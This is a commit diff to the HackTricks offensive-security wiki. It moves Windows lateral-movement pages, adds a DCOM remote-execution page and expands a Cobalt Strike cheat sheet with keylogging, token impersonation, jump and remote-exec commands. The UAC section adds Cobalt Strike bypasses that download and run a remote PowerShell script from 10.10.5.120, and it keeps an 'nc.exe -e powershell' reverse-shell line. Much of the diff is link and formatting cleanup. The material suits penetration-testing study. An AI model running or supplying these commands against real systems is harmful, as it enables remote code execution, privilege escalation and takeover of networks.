GitBook: [#3371] No subject

SUMMARY.md

@@ -180,11 +180,13 @@
   * [Unconstrained Delegation](windows-hardening/active-directory-methodology/unconstrained-delegation.md)
 * [NTLM](windows-hardening/ntlm/README.md)
   * [Places to steal NTLM creds](windows-hardening/ntlm/places-to-steal-ntlm-creds.md)
-  * [PsExec/Winexec/ScExec](windows-hardening/ntlm/psexec-and-winexec.md)
-  * [SmbExec/ScExec](windows-hardening/ntlm/smbexec.md)
-  * [WmicExec](windows-hardening/ntlm/wmicexec.md)
-  * [AtExec / SchtasksExec](windows-hardening/ntlm/atexec.md)
-  * [WinRM](windows-hardening/ntlm/winrm.md)
+* [Lateral Movement](windows-hardening/lateral-movement/README.md)
+  * [AtExec / SchtasksExec](windows-hardening/lateral-movement/atexec.md)
+  * [DCOM Exec](windows-hardening/lateral-movement/dcom-exec.md)
+  * [PsExec/Winexec/ScExec](windows-hardening/lateral-movement/psexec-and-winexec.md)
+  * [SmbExec/ScExec](windows-hardening/lateral-movement/smbexec.md)
+  * [WinRM](windows-hardening/lateral-movement/winrm.md)
+  * [WmicExec](windows-hardening/lateral-movement/wmicexec.md)
 * [Authentication, Credentials, UAC and EFS](windows-hardening/authentication-credentials-uac-and-efs.md)
 * [Stealing Credentials](windows-hardening/stealing-credentials/README.md)
   * [Credentials Protections](windows-hardening/stealing-credentials/credentials-protections.md)

backdoors/salseo.md

@@ -30,7 +30,7 @@ You can **select the architecture** inside Visual Studio in the **left "Build" T
 
 Then, build both projects (Build -> Build Solution) (Inside the logs will appear the path of the executable):
 
-![](<../.gitbook/assets/image (1) (2).png>)
+![](<../.gitbook/assets/image (1) (2) (1).png>)
 
 ## Prepare the Backdoor
 
@@ -103,17 +103,17 @@ Open the SalseoLoader project using Visual Studio.
 
 ### Add before the main function: \[DllExport]
 
-![](<../.gitbook/assets/image (2) (1).png>)
+![](<../.gitbook/assets/image (2) (1) (1).png>)
 
 ### Install DllExport for this project
 
 #### **Tools** --> **NuGet Package Manager** --> **Manage NuGet Packages for Solution...**
 
-![](<../.gitbook/assets/image (3) (1).png>)
+![](<../.gitbook/assets/image (3) (1) (1).png>)
 
 #### **Search for DllExport package (using Browse tab), and press Install (and accept the popup)**
 
-![](<../.gitbook/assets/image (4).png>)
+![](<../.gitbook/assets/image (4) (1).png>)
 
 In your project folder have appeared the files: **DllExport.bat** and **DllExport\_Configure.bat**
 
@@ -131,13 +131,13 @@ Then, go to your **SalseoLoader folder** and **execute DllExport\_Configure.bat*
 
 Select **x64** (if you are going to use it inside a x64 box, that was my case), select **System.Runtime.InteropServices** (inside **Namespace for DllExport**) and press **Apply**
 
-![](<../.gitbook/assets/image (7).png>)
+![](<../.gitbook/assets/image (7) (1).png>)
 
 ### **Open the project again with visual Studio**
 
 **\[DllExport]** should not be longer marked as error
 
-![](<../.gitbook/assets/image (8).png>)
+![](<../.gitbook/assets/image (8) (1).png>)
 
 ### Build the solution
 

c2/cobalt-strike.md

@@ -2,13 +2,24 @@
 
 ### Listeners
 
-Cobalt Strike -> Listeners -> Add/Edit then you can select where to listen, which kind of beacon to use (http, dns, smb...) and more
+### C2 Listeners
+
+`Cobalt Strike -> Listeners -> Add/Edit` then you can select where to listen, which kind of beacon to use (http, dns, smb...) and more.
+
+### Peer2Peer Listeners
+
+The beacons of these listeners don't need to talk to the C2 directly, they can communicate to it through other beacons.
+
+`Cobalt Strike -> Listeners -> Add/Edit` then you need to select the TCP or SMB beacons
+
+* The **TCP beacon will set a listener in the port selected**. To connect to a TCP beacon use the command `connect <ip> <port>` from another beacon
+* The **smb beacon will listen in a pipename with the selected name**. To connect to a SMB beacon you need to use the command `link [target] [pipe]`.
 
 ### Generate & Host payloads
 
 #### Generate payloads in files
 
-Attacks -> Packages ->&#x20;
+`Attacks -> Packages ->`&#x20;
 
 * **`HTMLApplication`** for HTA files
 * **`MS Office Macro`** for an office document with a macro
@@ -17,7 +28,7 @@ Attacks -> Packages ->&#x20;
 
 #### Generate & Host payloads
 
-A`ttacks -> Web Drive-by -> Scripted Web Delivery (S)` This will generate a script/executable to download the beacon from cobalt strike in formats such as: bitsadmin, exe, powershell and python
+`Attacks -> Web Drive-by -> Scripted Web Delivery (S)` This will generate a script/executable to download the beacon from cobalt strike in formats such as: bitsadmin, exe, powershell and python
 
 #### Host Payloads
 
@@ -25,10 +36,8 @@ If you already has the file you want to host in a web sever just go to `Attacks
 
 ### Beacon Options
 
-```bash
-# Execute local .NET binary
-execute-assembly </path/to/executable.exe>
-
+<pre class="language-bash"><code class="lang-bash"># Execute local .NET binary
+execute-assembly &#x3C;/path/to/executable.exe>
 
 # Screenshots
 printscreen    # Take a single screenshot via PrintScr method
@@ -39,4 +48,30 @@ screenwatch    # Take periodic screenshots of desktop
 # keylogger
 keylogger [pid] [x86|x64]
 ## View > Keystrokes to see the keys pressed
-```
+
+# Import Powershell module
+powershell-import C:\path\to\PowerView.ps1
+
+# User impersonation
+make_token [DOMAIN\user] [password] #Create token tom impersonate user
+
+# Lateral Movement
+## If a token was created it will be used
+jump [method] [target] [listener]
+## Methods:
+## psexec                    x86   Use a service to run a Service EXE artifact
+## psexec64                  x64   Use a service to run a Service EXE artifact
+## psexec_psh                x86   Use a service to run a PowerShell one-liner
+## winrm                     x86   Run a PowerShell script via WinRM
+## winrm64                   x64   Run a PowerShell script via WinRM
+
+remote-exec [method] [target] [command]
+## Methods:
+<strong>## psexec                          Remote execute via Service Control Manager
+</strong>## winrm                           Remote execute via WinRM (PowerShell)
+## wmi                             Remote execute via WMI
+
+## To execute a beacon with wmi (it isn't ins the jump command) just upload the beacon and execute it
+beacon> upload C:\Payloads\beacon-smb.exe
+beacon> remote-exec wmi srv-1 C:\Windows\beacon-smb.exe
+</code></pre>

network-services-pentesting/pentesting-smb.md

@@ -382,10 +382,10 @@ crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --pass-pol #Get
 crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --rid-brute #RID brute
 ```
 
-### [**psexec**](../windows-hardening/ntlm/psexec-and-winexec.md)**/**[**smbexec**](../windows-hardening/ntlm/smbexec.md)
+### [**psexec**](../windows-hardening/lateral-movement/psexec-and-winexec.md)**/**[**smbexec**](../windows-hardening/lateral-movement/smbexec.md)
 
 Both options will **create a new service** (using _\pipe\svcctl_ via SMB) in the victim machine and use it to **execute something** (**psexec** will **upload** an executable file to ADMIN$ share and **smbexec** will point to **cmd.exe/powershell.exe** and put in the arguments the payload --**file-less technique-**-).\
-**More info** about [**psexec** ](../windows-hardening/ntlm/psexec-and-winexec.md)and [**smbexec**](../windows-hardening/ntlm/smbexec.md).\
+**More info** about [**psexec** ](../windows-hardening/lateral-movement/psexec-and-winexec.md)and [**smbexec**](../windows-hardening/lateral-movement/smbexec.md).\
 In **kali** it is located on /usr/share/doc/python3-impacket/examples/
 
 ```bash
@@ -398,7 +398,7 @@ psexec \\192.168.122.66 -u Administrator -p q23q34t34twd3w34t34wtw34t # Use pass
 
 Using **parameter**`-k` you can authenticate against **kerberos** instead of **NTLM**
 
-### [wmiexec](../windows-hardening/ntlm/wmicexec.md)/dcomexec
+### [wmiexec](../windows-hardening/lateral-movement/wmicexec.md)/dcomexec
 
 Stealthily execute a command shell without touching the disk or running a new service using DCOM via **port 135.**\
 In **kali** it is located on /usr/share/doc/python3-impacket/examples/
@@ -419,7 +419,7 @@ Using **parameter**`-k` you can authenticate against **kerberos** instead of **N
 #You can append to the end of the command a CMD command to be executed, if you dont do that a semi-interactive shell will be prompted
 ```
 
-### [AtExec](../windows-hardening/ntlm/atexec.md)
+### [AtExec](../windows-hardening/lateral-movement/atexec.md)
 
 Execute commands via the Task Scheduler (using _\pipe\atsvc_ via SMB).\
 In **kali** it is located on /usr/share/doc/python3-impacket/examples/

pentesting-web/deserialization/jndi-java-naming-and-directory-interface-and-log4shell.md

@@ -420,13 +420,13 @@ As seen in this page in [**previous payloads**](jndi-java-naming-and-directory-i
 
 In the CTF, you **couldn't access the stderr** of the java application using log4J, but Log4J **exceptions are sent to stdout**, which was printed in the python app. This meant that triggering an exception we could access the content. An exception to exfiltrate the flag was: **`${java:${env:FLAG}}`.** This works because **`${java:CTF{blahblah}}`** doesn't exist and an exception with the value of the flag will be shown:
 
-![](../../.gitbook/assets/image.png)
+![](<../../.gitbook/assets/image (7).png>)
 
 ### Conversion Patterns Exceptions
 
 Just to mention it, you could also inject new [**conversion patterns**](https://logging.apache.org/log4j/2.x/manual/layouts.html#PatternLayout) and trigger exceptions that will be logged to `stdout`. For example:
 
-![](<../../.gitbook/assets/image (3).png>)
+![](<../../.gitbook/assets/image (3) (1).png>)
 
 This wasn't found useful to exfiltrate date inside the error message, because the lookup wasn't solved before the conversion pattern, but it could be useful for other stuff such as detecting.
 

pentesting-web/file-upload/README.md

@@ -16,7 +16,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 
 </details>
 
-![](<../../.gitbook/assets/image (2).png>)
+![](<../../.gitbook/assets/image (2) (1).png>)
 
 **Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
 
@@ -110,7 +110,7 @@ The `.inc` extension is sometimes used for php files that are only used to **imp
 
 If you can upload a XML file into a Jetty server you can obtain [RCE because **new \*.xml and \*.war are automatically processed**](https://twitter.com/ptswarm/status/1555184661751648256/photo/1)**.** So, as mentioned in the following image, upload the XML file to `$JETTY_BASE/webapps/` and expect the shell!
 
-![](<../../.gitbook/assets/image (1).png>)
+![](<../../.gitbook/assets/image (1) (2).png>)
 
 ## **wget File Upload/SSRF Trick**
 

windows-hardening/active-directory-methodology/silver-ticket.md

@@ -99,8 +99,8 @@ copy afile.txt \\vulnerable.computer\C$\Windows\Temp
 
 You will also be able to obtain a shell inside the host or execute arbitrary commands using **psexec**:
 
-{% content-ref url="../ntlm/psexec-and-winexec.md" %}
-[psexec-and-winexec.md](../ntlm/psexec-and-winexec.md)
+{% content-ref url="../lateral-movement/psexec-and-winexec.md" %}
+[psexec-and-winexec.md](../lateral-movement/psexec-and-winexec.md)
 {% endcontent-ref %}
 
 ### HOST
@@ -135,8 +135,8 @@ wmic remote.computer.local list full /format:list
 
 Find **more information about wmiexec** in the following page:
 
-{% content-ref url="../ntlm/wmicexec.md" %}
-[wmicexec.md](../ntlm/wmicexec.md)
+{% content-ref url="../lateral-movement/wmicexec.md" %}
+[wmicexec.md](../lateral-movement/wmicexec.md)
 {% endcontent-ref %}
 
 ### HOST + WSMAN (WINRM)
@@ -149,8 +149,8 @@ New-PSSession -Name PSC -ComputerName the.computer.name; Enter-PSSession PSC
 
 Check the following page to learn **more ways to connect with a remote host using winrm**:
 
-{% content-ref url="../ntlm/winrm.md" %}
-[winrm.md](../ntlm/winrm.md)
+{% content-ref url="../lateral-movement/winrm.md" %}
+[winrm.md](../lateral-movement/winrm.md)
 {% endcontent-ref %}
 
 {% hint style="warning" %}

windows-hardening/authentication-credentials-uac-and-efs.md

@@ -1,4 +1,4 @@
-
+# Authentication, Credentials, UAC and EFS
 
 <details>
 
@@ -16,14 +16,13 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 
 </details>
 
-
-# Security Support Provider Interface (SSPI)
+## Security Support Provider Interface (SSPI)
 
 Is the API that can be use to authenticate users.
 
 The SSPI will be in charge of finding the adequate protocol for two machines that want to communicate. The preferred method for this is Kerberos. Then the SSPI will negotiate which authentication protocol will be used, these authentication protocols are called Security Support Provider (SSP), are located inside each Windows machine in the form of a DLL and both machines must support the same to be able to communicate.
 
-## Main SSPs
+### Main SSPs
 
 * **Kerberos**: The preferred one
   * %windir%\Windows\System32\kerberos.dll
@@ -36,27 +35,27 @@ The SSPI will be in charge of finding the adequate protocol for two machines tha
 * **Negotiate**: It is used to negotiate the protocol to use (Kerberos or NTLM being Kerberos the default one)
   * %windir%\Windows\System32\lsasrv.dll
 
-### The negotiation could offer several methods or only one.
+#### The negotiation could offer several methods or only one.
 
-# Local Security Authority (LSA)
+## Local Security Authority (LSA)
 
 The **credentials** (hashed) are **saved** in the **memory** of this subsystem for Single Sign-On reasons.\
 **LSA** administrates the local **security policy** (password policy, users permissions...), **authentication**, **access tokens**...\
 LSA will be the one that will **check** for provided credentials inside the **SAM** file (for a local login) and **talk** with the **domain controller** to authenticate a domain user.
 
-The **credentials** are **saved** inside the **process **_**LSASS**_: Kerberos tickets, hashes NT and LM, easily decrypted passwords.
+The **credentials** are **saved** inside the **process \_LSASS**\_: Kerberos tickets, hashes NT and LM, easily decrypted passwords.
 
-# Credentials Storage
+## Credentials Storage
 
-## Security Accounts Manager (SAM)
+### Security Accounts Manager (SAM)
 
 Local credentials are present in this file, the passwords are hashed.
 
-## LSASS
+### LSASS
 
 We have talk about this. Different credentials are saved in the memory of this process.
 
-## LSA secrets
+### LSA secrets
 
 LSA could save in disk some credentials:
 
@@ -65,15 +64,15 @@ LSA could save in disk some credentials:
 * Passwords for scheduled tasks
 * More (password of IIS applications...)
 
-## NTDS.dit
+### NTDS.dit
 
 It is the database of the Active Directory. It is only present in Domain Controllers.
 
-## Credential Manager store
+### Credential Manager store
 
 Allows browsers and other Windows applications to save credentials.
 
-# UAC
+## UAC
 
 UAC is used to allow an **administrator user to not give administrator privileges to each process executed**. This is **achieved using default** the **low privileged token** of the user. When, the administrator executes some process **as administrator**, a **UAC elevation** is performed and if it is successfully completed, the privileged token is used to create the process.
 
@@ -89,7 +88,7 @@ Then, to **bypass** the **UAC** (elevate from **medium** integrity level **to hi
 
 You can **check** the _**Manifest**_ of a binary using the tool _**sigcheck.exe**_ from Sysinternals. And you can **see** the **integrity level** of the processes using _Process Explorer_ or _Process Monitor_ (of Sysinternals).
 
-## Check UAC
+### Check UAC
 
 First you need to check the value of the key **EnableLUA**, if it's **`1`** then UAC is **activated**, if its **`0`** or it **doesn't exist**, then UAC is **inactive**.
 
@@ -97,7 +96,7 @@ First you need to check the value of the key **EnableLUA**, if it's **`1`** then
  reg query HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ 
 ```
 
-Then you have to check the value of the key **`ConsentPromptBehaviorAdmin`**in the same entry of the registry as before (info from [here](https://docs.microsoft.com/en-us/openspecs/windows\_protocols/ms-gpsb/341747f5-6b5d-4d30-85fc-fa1cc04038d4)):
+Then you have to check the value of the key **`ConsentPromptBehaviorAdmin`** in the same entry of the registry as before (info from [here](https://docs.microsoft.com/en-us/openspecs/windows\_protocols/ms-gpsb/341747f5-6b5d-4d30-85fc-fa1cc04038d4)):
 
 * If **`0`** then, UAC won't prompt (like **disabled**)
 * If **`1`** the admin is **asked for username and password** to execute the binary with high rights (on Secure Desktop)
@@ -106,20 +105,20 @@ Then you have to check the value of the key **`ConsentPromptBehaviorAdmin`**in t
 * If **`4`** like `2` but not necessary on Secure Desktop
 * if **`5`**(**default**) it will ask the administrator to confirm to run non Windows binaries with high privileges
 
-Then, you have to take a look at the value of **`LocalAccountTokenFilterPolicy`** \
+Then, you have to take a look at the value of **`LocalAccountTokenFilterPolicy`**\
 If the value is **`0`**, then, only the **RID 500** user (**built-in Administrator**) is able to perform **admin tasks without UAC**, and if its `1`, **all accounts inside "Administrators"** group can do them.
 
 And, finally take a look at the value of the key **`FilterAdministratorToken`**\
 If **`0`**(default), the **built-in Administrator account can** do remote administration tasks and if **`1`** the built-in account Administrator **cannot** do remote administration tasks, unless `LocalAccountTokenFilterPolicy` is set to `1`.
 
-### Summary
+#### Summary
 
-* If **`EnableLUA=0`**or **doesn't exist**, **no UAC for anyone**
-* If ** `EnableLua=1` ** and **`LocalAccountTokenFilterPolicy=1` , No UAC for anyone**
-* If ** `EnableLua=1` ** and **`LocalAccountTokenFilterPolicy=0` ** and ** `FilterAdministratorToken=0`, No UAC for RID 500 (Built-in Administrator)**
-* If ** `EnableLua=1` ** and **`LocalAccountTokenFilterPolicy=0` ** and ** `FilterAdministratorToken=1`, UAC for everyone**
+* If `EnableLUA=0` or **doesn't exist**, **no UAC for anyone**
+* If  `EnableLua=1`  and **`LocalAccountTokenFilterPolicy=1` , No UAC for anyone**
+* If  `EnableLua=1`  and **`LocalAccountTokenFilterPolicy=0`  and `FilterAdministratorToken=0`, No UAC for RID 500 (Built-in Administrator)**
+* If `EnableLua=1`  and **`LocalAccountTokenFilterPolicy=0` and `FilterAdministratorToken=1`, UAC for everyone**
 
-## UAC bypass
+### UAC bypass
 
 {% hint style="info" %}
 Note that if you have graphical access to the victim, UAC bypass is straight forward as you can simply click on "Yes" when the UAS prompt appears
@@ -137,11 +136,11 @@ net user %username%
 whoami /groups | findstr Level
 ```
 
-### **Very** Basic UAC "bypass" (full file system access)
+#### **Very** Basic UAC "bypass" (full file system access)
 
 If you have a shell with a user that is inside the Administrators group you can **mount the C$** shared via SMB (file system) local in a new disk and you will have **access to everything inside the file system** (even Administrator home folder).
 
-{% hint style="info" %}
+{% hint style="warning" %}
 **Looks like this trick isn't working anymore**
 {% endhint %}
 
@@ -153,9 +152,9 @@ cd C$
 dir \\127.0.0.1\c$\Users\Administrator\Desktop
 ```
 
-### UAC disabled
+#### UAC disabled
 
-If UAC is already disabled (**`ConsentPromptBehaviorAdmin`**is **`0`**) you can **execute a reverse shell with admin privileges** (high integrity level) using something like:
+If UAC is already disabled (`ConsentPromptBehaviorAdmin` is **`0`**) you can **execute a reverse shell with admin privileges** (high integrity level) using something like:
 
 ```bash
 #Put your reverse shell instead of "calc.exe"
@@ -163,14 +162,35 @@ Start-Process powershell -Verb runAs "calc.exe"
 Start-Process powershell -Verb runAs "C:\Windows\Temp\nc.exe -e powershell 10.10.14.7 4444"
 ```
 
-### UAC bypass exploits
+#### UAC bypass with token duplication
 
-You could also use some tools to **bypass UAC like** [**UACME** ](https://github.com/hfiref0x/UACME)which is a **compilation** of several UAC bypass exploits. Note that you will need to **compile UACME using visual studio or msbuild**. The compilation will create several executables (like_Source\Akagi\outout\x64\Debug\Akagi.exe_) , you will need to know **which one you need.**\
+* [https://ijustwannared.team/2017/11/05/uac-bypass-with-token-duplication/](https://ijustwannared.team/2017/11/05/uac-bypass-with-token-duplication/)
+* [https://www.tiraniddo.dev/2018/10/farewell-to-token-stealing-uac-bypass.html](https://www.tiraniddo.dev/2018/10/farewell-to-token-stealing-uac-bypass.html)
+
+#### UAC bypass with cobalt strike
+
+The Cobalt Strike techniques will only work if UAC is not set at it's max security level
+
+```bash
+# UAC bypass via token duplication
+elevate uac-token-duplication [listener_name]
+# UAC bypass via service
+elevate svc-exe [listener_name]
+
+# Bypass UAC with Token Duplication
+runasadmin uac-token-duplication powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.10.5.120:80/b'))"
+# Bypass UAC with CMSTPLUA COM interface
+runasadmin uac-cmstplua powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.10.5.120:80/b'))"
+```
+
+#### UAC bypass exploits
+
+You could also use some tools to **bypass UAC like** [**UACME** ](https://github.com/hfiref0x/UACME)which is a **compilation** of several UAC bypass exploits. Note that you will need to **compile UACME using visual studio or msbuild**. The compilation will create several executables (like\_Source\Akagi\outout\x64\Debug\Akagi.exe\_) , you will need to know **which one you need.**\
 You should **be careful** because some bypasses will **prompt some other programs** that will **alert** the **user** that something is happening.
 
 **Empire** and **Metasploit** also have several modules to **bypass** the **UAC**.
 
-### More UAC bypass
+#### More UAC bypass
 
 **All** the techniques used here to bypass AUC **require** a **full interactive shell** with the victim (a common nc.exe shell is not enough).
 
@@ -180,7 +200,7 @@ You can get using a **meterpreter** session. Migrate to a **process** that has t
 
 (_explorer.exe_ should works)
 
-## Your own bypass - Basic UAC bypass methodology
+### Your own bypass - Basic UAC bypass methodology
 
 If you take a look to **UACME** you will note that **most UAC bypasses abuse a Dll Hijacking vulnerabilit**y (mainly writing the malicious dll on _C:\Windows\System32_). [Read this to learn how to find a Dll Hijacking vulnerability](windows-local-privilege-escalation/dll-hijacking.md).
 
@@ -191,13 +211,13 @@ If you take a look to **UACME** you will note that **most UAC bypasses abuse a D
    2. **IFileOperation**: Windows 10.
 4. Prepare a **script** to copy your DLL inside the protected path and execute the vulnerable and autoelevated binary.
 
-### Another UAC bypass technique
+#### Another UAC bypass technique
 
 Consists on watching if an **autoElevated binary** tries to **read** from the **registry** the **name/path** of a **binary** or **command** to be **executed** (this is more interesting if the binary searches this information inside the **HKCU**).
 
-# EFS (Encrypted File System)
+## EFS (Encrypted File System)
 
-EFS works by encrypting a file with a bulk **symmetric key**, also known as the File Encryption Key, or **FEK**.  The FEK is then **encrypted** with a **public key** that is associated with the user who encrypted the file, and this encrypted FEK is stored in the $EFS **alternative data stream** of the encrypted file. To decrypt the file, the EFS component driver uses the **private key** that matches the EFS digital certificate (used to encrypt the file) to decrypt the symmetric key that is stored in the $EFS stream. From [here](https://en.wikipedia.org/wiki/Encrypting\_File\_System).
+EFS works by encrypting a file with a bulk **symmetric key**, also known as the File Encryption Key, or **FEK**. The FEK is then **encrypted** with a **public key** that is associated with the user who encrypted the file, and this encrypted FEK is stored in the $EFS **alternative data stream** of the encrypted file. To decrypt the file, the EFS component driver uses the **private key** that matches the EFS digital certificate (used to encrypt the file) to decrypt the symmetric key that is stored in the $EFS stream. From [here](https://en.wikipedia.org/wiki/Encrypting\_File\_System).
 
 Examples of files being decrypted without the user asking for it:
 
@@ -206,25 +226,23 @@ Examples of files being decrypted without the user asking for it:
 
 The encrypted files using this method can be **tansparently access by the owner user** (the one who has encrypted them), so if you can **become that user** you can decrypt the files (changing the password of the user and logins as him won't work).
 
-## Check EFS info
+### Check EFS info
 
 Check if a **user** has **used** this **service** checking if this path exists:`C:\users\<username>\appdata\roaming\Microsoft\Protect`
 
 Check **who** has **access** to the file using cipher /c \<file>\
 You can also use `cipher /e` and `cipher /d` inside a folder to **encrypt** and **decrypt** all the files
 
-## Decrypting EFS files
+### Decrypting EFS files
 
-### Being Authority System
+#### Being Authority System
 
 This way requires the **victim user** to be **running** a **process** inside the host. If that is the case, using a `meterpreter` sessions you can impersonate the token of the process of the user (`impersonate_token` from `incognito`). Or you could just `migrate` to process of the user.
 
-### Knowing the users password
+#### Knowing the users password
 
 {% embed url="https://github.com/gentilkiwi/mimikatz/wiki/howto-~-decrypt-EFS-files" %}
 
-
-
 <details>
 
 <summary><strong>Support HackTricks and get benefits!</strong></summary>
@@ -240,5 +258,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
 
 </details>
-
-

windows-hardening/basic-powershell-for-pentesters/README.md

@@ -244,6 +244,12 @@ https://slaeryan.github.io/posts/falcon-zero-alpha.html
 Get-Content C:\Users\<USERNAME>\AppData\Roaming\Microsoft\Windows\Powershell\PSReadline\ConsoleHost_history.txt
 ```
 
+## Get permissions
+
+```bash
+Get-Acl -Path "C:\Program Files\Vuln Services" | fl
+```
+
 ## OS version and HotFixes
 
 ```bash

windows-hardening/lateral-movement/README.md

@@ -0,0 +1,42 @@
+# Lateral Movement
+
+<details>
+
+<summary><strong>Support HackTricks and get benefits!</strong></summary>
+
+Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+
+Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
+
+Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+
+**Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+
+**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
+
+</details>
+
+There are different different ways to execute commands in external systems, here you can find the explanations on how the main Windows lateral movements techniques work:
+
+* [**PsExec**](psexec-and-winexec.md)****
+* [**SmbExec**](smbexec.md)****
+* [**WmicExec**](wmicexec.md)****
+* [**AtExec / SchtasksExec**](atexec.md)****
+* [**WinRM**](winrm.md)****
+* [**DCOM Exec**](dcom-exec.md)****
+
+<details>
+
+<summary><strong>Support HackTricks and get benefits!</strong></summary>
+
+Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+
+Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
+
+Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+
+**Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+
+**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
+
+</details>

windows-hardening/lateral-movement/dcom-exec.md

@@ -0,0 +1,175 @@
+# DCOM Exec
+
+<details>
+
+<summary><strong>Support HackTricks and get benefits!</strong></summary>
+
+Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+
+Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
+
+Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+
+**Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+
+**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**.
+
+</details>
+
+## MMC20.Application
+
+**DCOM** (Distributed Component Object Model) objects are **interesting** due to the ability to **interact** with the objects **over the network**. Microsoft has some good documentation on DCOM [here](https://msdn.microsoft.com/en-us/library/cc226801.aspx) and on COM [here](https://msdn.microsoft.com/en-us/library/windows/desktop/ms694363\(v=vs.85\).aspx). You can find a solid list of DCOM applications using PowerShell, by running `Get-CimInstance Win32_DCOMApplication`.
+
+The [MMC Application Class (MMC20.Application)](https://technet.microsoft.com/en-us/library/cc181199.aspx) COM object allows you to script components of MMC snap-in operations. While enumerating the different methods and properties within this COM object, I noticed that there is a method named `ExecuteShellCommand` under Document.ActiveView.
+
+![](<../../.gitbook/assets/image (3).png>)
+
+You can read more on that method [here](https://msdn.microsoft.com/en-us/library/aa815396\(v=vs.85\).aspx). So far, we have a DCOM application that we can access over the network and can execute commands. The final piece is to leverage this DCOM application and the ExecuteShellCommand method to obtain code execution on a remote host.
+
+Fortunately, as an admin, you can remotely interact with DCOM with PowerShell by using “`[activator]::CreateInstance([type]::GetTypeFromProgID`”. All you need to do is provide it a DCOM ProgID and an IP address. It will then provide you back an instance of that COM object remotely:
+
+![](<../../.gitbook/assets/image (8).png>)
+
+It is then possible to invoke the `ExecuteShellCommand` method to start a process on the remote host:
+
+![](../../.gitbook/assets/image.png)
+
+## ShellWindows & ShellBrowserWindow
+
+The **MMC20.Application** object lacked explicit “[LaunchPermissions](https://technet.microsoft.com/en-us/library/bb633148.aspx)”, resulting in the default permission set allowing Administrators access:
+
+![](<../../.gitbook/assets/image (4).png>)
+
+You can read more on that thread [here](https://twitter.com/tiraniddo/status/817532039771525120).\
+Viewing which other objects that have no explicit LaunchPermission set can be achieved using [@tiraniddo](https://twitter.com/tiraniddo)’s [OleView .NET](https://github.com/tyranid/oleviewdotnet), which has excellent Python filters (among other things). In this instance, we can filter down to all objects that have no explicit Launch Permission. When doing so, two objects stood out to me: `ShellBrowserWindow` and `ShellWindows`:
+
+![](<../../.gitbook/assets/image (1).png>)
+
+Another way to identify potential target objects is to look for the value `LaunchPermission` missing from keys in `HKCR:\AppID\{guid}`. An object with Launch Permissions set will look like below, with data representing the ACL for the object in Binary format:
+
+![](https://enigma0x3.files.wordpress.com/2017/01/launch\_permissions\_registry.png?w=690\&h=169)
+
+Those with no explicit LaunchPermission set will be missing that specific registry entry.
+
+### ShellWindows
+
